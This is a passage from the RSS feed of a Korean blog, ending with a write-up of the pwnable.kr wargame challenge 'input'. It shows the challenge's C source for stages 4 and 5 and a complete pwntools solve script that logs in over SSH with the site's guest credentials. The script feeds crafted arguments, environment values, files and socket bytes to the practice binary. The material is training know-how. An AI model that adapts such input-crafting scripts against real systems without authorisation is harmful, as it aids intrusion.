	if( memcmp(buf, &quot;\x00\x00\x00\x00&quot;, 4) ) return 0;
	fclose(fp);
	printf(&quot;Stage 4 clear!\n&quot;);&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Stage4는 \x0a 파일 4바이트를 buf로 읽어옵니다. buf에 들어간 4바이트가 \x00\x00\x00\x00 이라면 정상적으로 Stage clear가 가능합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;pre id=&quot;code_1625406822389&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;// network
	int sd, cd;
	struct sockaddr_in saddr, caddr;
	sd = socket(AF_INET, SOCK_STREAM, 0);
	if(sd == -1){
		printf(&quot;socket error, tell admin\n&quot;);
		return 0;
	}
	saddr.sin_family = AF_INET;
	saddr.sin_addr.s_addr = INADDR_ANY;
	saddr.sin_port = htons( atoi(argv['C']) );
	if(bind(sd, (struct sockaddr*)&amp;amp;saddr, sizeof(saddr)) &amp;lt; 0){
		printf(&quot;bind error, use another port\n&quot;);
    		return 1;
	}
	listen(sd, 1);
	int c = sizeof(struct sockaddr_in);
	cd = accept(sd, (struct sockaddr *)&amp;amp;caddr, (socklen_t*)&amp;amp;c);
	if(cd &amp;lt; 0){
		printf(&quot;accept error, tell admin\n&quot;);
		return 0;
	}
	if( recv(cd, buf, 4, 0) != 4 ) return 0;
	if(memcmp(buf, &quot;\xde\xad\xbe\xef&quot;, 4)) return 0;
	printf(&quot;Stage 5 clear!\n&quot;);
&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Stage5는 argv['C']를 받아와서 설정된 포트로 '\xde\xad\xbe\xef'를 보내주면 clear 됩니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최종 exploit 코드는 다음과 같습니다.&lt;/p&gt;
&lt;pre id=&quot;code_1625417947386&quot; class=&quot;c++ arduino&quot; data-ke-language=&quot;c++&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;from pwn import *

context.log_level = 'debug'
p = ssh(user=&quot;input2&quot;, host=&quot;pwnable.kr&quot;, port=2222, password=&quot;guest&quot;)

arg = [str(i) for i in range(100)]
arg[65] = &quot;\x00&quot;
arg[66] = &quot;\x20\x0a\x0d&quot;
arg[67] = &quot;22224&quot;

#strerr
p.write('/tmp/chobo/err', &quot;\x00\x0a\x02\xff&quot;)


#env
en = {'\xde\xad\xbe\xef':&quot;\xca\xfe\xba\xbe&quot;}

#make \x0a
p.write('/tmp/chobo/\x0a', &quot;\x00\x00\x00\x00&quot;)

p2 = p.process(cwd='/tmp/chobo', executable=&quot;/home/input2/input&quot;, argv=arg, stderr=&quot;/tmp/err&quot;, env=en)

print(p2.recvuntil('Stage 1 clear!'))
payload = &quot;\x00\x0a\x00\xff&quot;

p2.sendline(payload)

print(p2.recvuntil('Stage 2 clear!'))
print(p2.recvuntil('Stage 3 clear!'))
print(p2.recvuntil('Stage 4 clear!'))


local = p.remote('localhost', 22224)
local.send('\xde\xad\xbe\xef')

print(p2.recvuntil('Stage 5 clear!'))

p2.interactive()
&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;exploit 코드를 작성하여 Stage5 까지 clear 하여도 flag 값을 찾아올 수 없어서 삽질을 한참 했는데 처음에 그냥 /tmp 에서 작업을 했었는데 tmp에 새로 생성해준 디렉터리에서 작업하니 잘 됐다. 아마도 tmp 디렉터리에서 flag 파일 심볼링 링크 걸어준게 제대로 안됐던 것 같다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;pwntools의 다양한 기능에 대해서 알 수 있는 좋은 문제였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Reference&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://johyungen.tistory.com/471&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://johyungen.tistory.com/471&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1625418422803&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;[pwnable.kr] input 풀이 (pwntools process executable!!)&quot; data-og-description=&quot;소스코드 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66..&quot; data-og-host=&quot;johyungen.tistory.com&quot; data-og-source-url=&quot;https://johyungen.tistory.com/471&quot; data-og-url=&quot;https://johyungen.tistory.com/471&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/5p52w/hyKMG2yNKf/TqsmMRJgdLA6N2BSgwok6k/img.png?width=174&amp;amp;height=234&amp;amp;face=0_0_174_234,https://scrap.kakaocdn.net/dn/FrvSj/hyKMOzvUUh/kP7wEaYqr52pFtY5Z5lJhK/img.png?width=174&amp;amp;height=234&amp;amp;face=0_0_174_234,https://scrap.kakaocdn.net/dn/xsvEY/hyKMHG9cNm/pwuYItYBOriOK9iKMcIqk1/img.png?width=400&amp;amp;height=400&amp;amp;face=0_0_400_400&quot;&gt;&lt;a href=&quot;https://johyungen.tistory.com/471&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://johyungen.tistory.com/471&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/5p52w/hyKMG2yNKf/TqsmMRJgdLA6N2BSgwok6k/img.png?width=174&amp;amp;height=234&amp;amp;face=0_0_174_234,https://scrap.kakaocdn.net/dn/FrvSj/hyKMOzvUUh/kP7wEaYqr52pFtY5Z5lJhK/img.png?width=174&amp;amp;height=234&amp;amp;face=0_0_174_234,https://scrap.kakaocdn.net/dn/xsvEY/hyKMHG9cNm/pwuYItYBOriOK9iKMcIqk1/img.png?width=400&amp;amp;height=400&amp;amp;face=0_0_400_400');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;[pwnable.kr] input 풀이 (pwntools process executable!!)&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;소스코드 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66..&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;johyungen.tistory.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <author>zzasgi</author>
      <guid isPermaLink="true">https://zzasgi.tistory.com/10</guid>
      <comments>https://zzasgi.tistory.com/10#entry10comment</comments>
      <pubDate>Sat, 15 May 2021 02:44:23 +0900</pubDate>
    </item>
  </channel>
</rss>